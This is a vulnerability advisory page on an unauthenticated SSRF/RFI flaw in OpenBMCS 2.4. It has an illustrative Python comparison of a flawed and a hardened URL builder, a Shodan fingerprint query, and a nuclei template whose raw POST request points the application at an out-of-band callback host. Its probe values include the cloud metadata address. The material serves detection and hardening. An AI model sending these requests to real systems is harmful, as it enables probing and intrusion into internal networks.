OpenBMCS 2.4 Server-Side Request Forgery / Remote File Inclusion Vulnerability

Vulnerability information

Vulnerability name: OpenBMCS 2.4 Server-Side Request Forgery / Remote File Inclusion Vulnerability

Vulnerability type: Server-Side Request Forgery

Severity: Medium

Description: OpenBMCS is a web-based building management and control system (not to be confused with OpenBMC, the baseboard management controller firmware project, despite the similar name). Version 2.4 contains an unauthenticated server-side request forgery (SSRF) and remote file inclusion (RFI) flaw: an attacker can make the application issue HTTP requests to, and include content from, a host of the attacker's choosing.

Root cause: the endpoint /php/query.php takes the POST parameter 'ip' and uses it, without any validation, as the host to query (port 81 by default); the 'argu' parameter supplies the request path. Because neither the destination host nor the port is constrained, an attacker can point the application's outbound HTTP request at an arbitrary external or internal host.

Risk: with the SSRF an attacker can probe services on the internal network that the OpenBMCS host can reach, bypass firewall rules that only the server is allowed through, and, combined with other weaknesses, potentially reach remote code execution. Exploitation needs no authentication and is a single POST request, so it is trivial to automate; this makes the flaw a medium-severity threat to any organisation exposing OpenBMCS. Administrators should update the software or apply a patch, and restrict network access to the application in the meantime.
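An added example to make the root cause concrete (this is editorial illustration code, not the OpenBMCS source, the nuclei template, or the exploit author's code). It models the flawed behaviour the advisory describes, the raw 'ip' value becoming the outbound request host with port 81 added only when none is supplied and 'argu' appended as the path, beside a hardened builder that accepts only IP literals from an allowlist of managed hosts, only the expected port, and only a known path. The reconstruction of the URL format, the inventory MANAGED_HOSTS, the path set ALLOWED_PATHS and the sample probe values are all assumptions; the real query.php code is not on the page.

```python
from __future__ import annotations

import ipaddress

# Constructed assumptions for the example (the real OpenBMCS inventory,
# port handling and path set are not on the page):
QUERY_PORT = 81                                          # "port 81 by default" per the advisory
MANAGED_HOSTS = {"10.0.0.21", "10.0.0.22", "fd00::21"}   # hypothetical inventory of monitored hosts
ALLOWED_PATHS = {"/", "/status", "/sensors"}             # hypothetical set of legitimate query paths


def vulnerable_build_url(ip_param: str, argu: str) -> str:
    """Model of the flawed behaviour the advisory describes (reconstructed, not the
    real query.php): the raw 'ip' value becomes the request host, port 81 is added
    only if the caller supplied none, and 'argu' is appended as the path. Host,
    port and path are therefore all attacker-controlled."""
    target = ip_param if ":" in ip_param else f"{ip_param}:{QUERY_PORT}"
    return f"http://{target}{argu}"


def parse_target(ip_param: str) -> tuple[ipaddress.IPv4Address | ipaddress.IPv6Address, int]:
    """Parse 'ip' as an IP literal with an optional port. Hostnames, schemes, paths
    and anything else that is not an address literal raise ValueError, which keeps
    DNS (and DNS rebinding) out of the picture entirely."""
    host, port = ip_param, QUERY_PORT
    if ip_param.startswith("["):                     # bracketed IPv6, e.g. [fd00::21]:81
        end = ip_param.find("]")
        if end == -1:
            raise ValueError("unterminated IPv6 literal")
        host, rest = ip_param[1:end], ip_param[end + 1:]
        if rest:
            if not rest.startswith(":"):
                raise ValueError("junk after IPv6 literal")
            port = int(rest[1:])
    elif ip_param.count(":") == 1:                   # IPv4 with port, e.g. 10.0.0.21:81
        host, port_str = ip_param.split(":")
        port = int(port_str)
    # Anything else is treated as a bare address; ip_address() rejects
    # hostnames, "1.2.3.4/path", "http://..." and other non-literals.
    return ipaddress.ip_address(host), port


def safe_build_url(ip_param: str, argu: str) -> str:
    """Hardened version: only literal addresses from the inventory, only the
    expected port, only a known path. Allowlisting the destination is what closes
    the SSRF; the is_* checks are defence in depth in case the inventory is ever
    populated from untrusted input."""
    addr, port = parse_target(ip_param)
    if port != QUERY_PORT:
        raise ValueError(f"unexpected port {port}")
    if addr.is_loopback or addr.is_link_local or addr.is_multicast or addr.is_unspecified:
        raise ValueError(f"{addr} is not a valid query target")
    if str(addr) not in MANAGED_HOSTS:
        raise ValueError(f"{addr} is not a managed host")
    if argu not in ALLOWED_PATHS:
        raise ValueError(f"unexpected path {argu!r}")
    host = f"[{addr}]" if addr.version == 6 else str(addr)
    return f"http://{host}:{port}{argu}"


def rejected(ip_param: str, argu: str) -> bool:
    """True if the hardened builder refuses the pair (used to compare the two builders)."""
    try:
        safe_build_url(ip_param, argu)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed probe values; the first mirrors the nuclei payload ip=<oast host>:<port>&argu=/
    probes = [
        ("xyz.oast.example:443", "/"),                  # out-of-band callback host
        ("169.254.169.254:80", "/latest/meta-data/"),   # cloud metadata service
        ("127.0.0.1:81", "/"),                          # loopback-only service
        ("10.0.0.21", "/status"),                       # the one legitimate request
    ]
    for ip_param, argu in probes:
        print(f"{ip_param:24} vulnerable -> {vulnerable_build_url(ip_param, argu)}")
        outcome = "REJECTED" if rejected(ip_param, argu) else safe_build_url(ip_param, argu)
        print(f"{'':24} hardened   -> {outcome}")
```

The hardened builder deliberately refuses hostnames rather than resolving them: resolving and then checking the result reopens the hole through DNS rebinding and through the time gap between the check and the HTTP client's own lookup. If OpenBMCS genuinely needs hostnames, the allowlist should hold the hostnames themselves and the check should compare the literal string, not the resolved address.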

Vendor: OpenBMCS

Product: OpenBMCS

Affected version: 2.4

Search query (Shodan): http.favicon.hash:1550906681

Source: https://github.com/projectdiscovery/nuclei-templates/blob/3442666f0f77cfb9c0212eb8044484062643effd/http%2Fmisconfiguration%2Fopenbmcs%2Fopenbmcs-ssrf.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details (nuclei template)


id: openbmcs-ssrf

info:
  name: OpenBMCS 2.4 - Server-Side Request Forgery / Remote File Inclusion
  author: dhiyaneshDK, NaN-KoreLogic
  severity: medium
  description: OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.
  reference:
    - https://www.exploit-db.com/exploits/50670
    - https://securityforeveryone.com/tools/openbmcs-unauth-ssrf-rfi-vulnerability-scanner
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 6.8
    cwe-id: CWE-918
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:1550906681
  tags: ssrf,oast,openbmcs,edb,misconfig

http:
  - raw:
      - |
        POST /php/query.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        ip={{interactsh-url}}:{{Port}}&argu=/

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP interaction with the OAST host
        words:
          - "http"

      - type: status
        status:
          - 302
# digest: 490a0046304402205155d95257b9c18693f3de6fccafad786fdbe03a9942202d2ec16a4a4c52cfb002204fed2d95c0f6f82a6f73210e7279aff69284f3e7079c9906bd3b61735bcbb9ae:922c64590222798bb761d5b6d8e72950


Source page: http://example.com/2025/07/06/github_37989097/
Author: lianccc
Published: 6 July 2025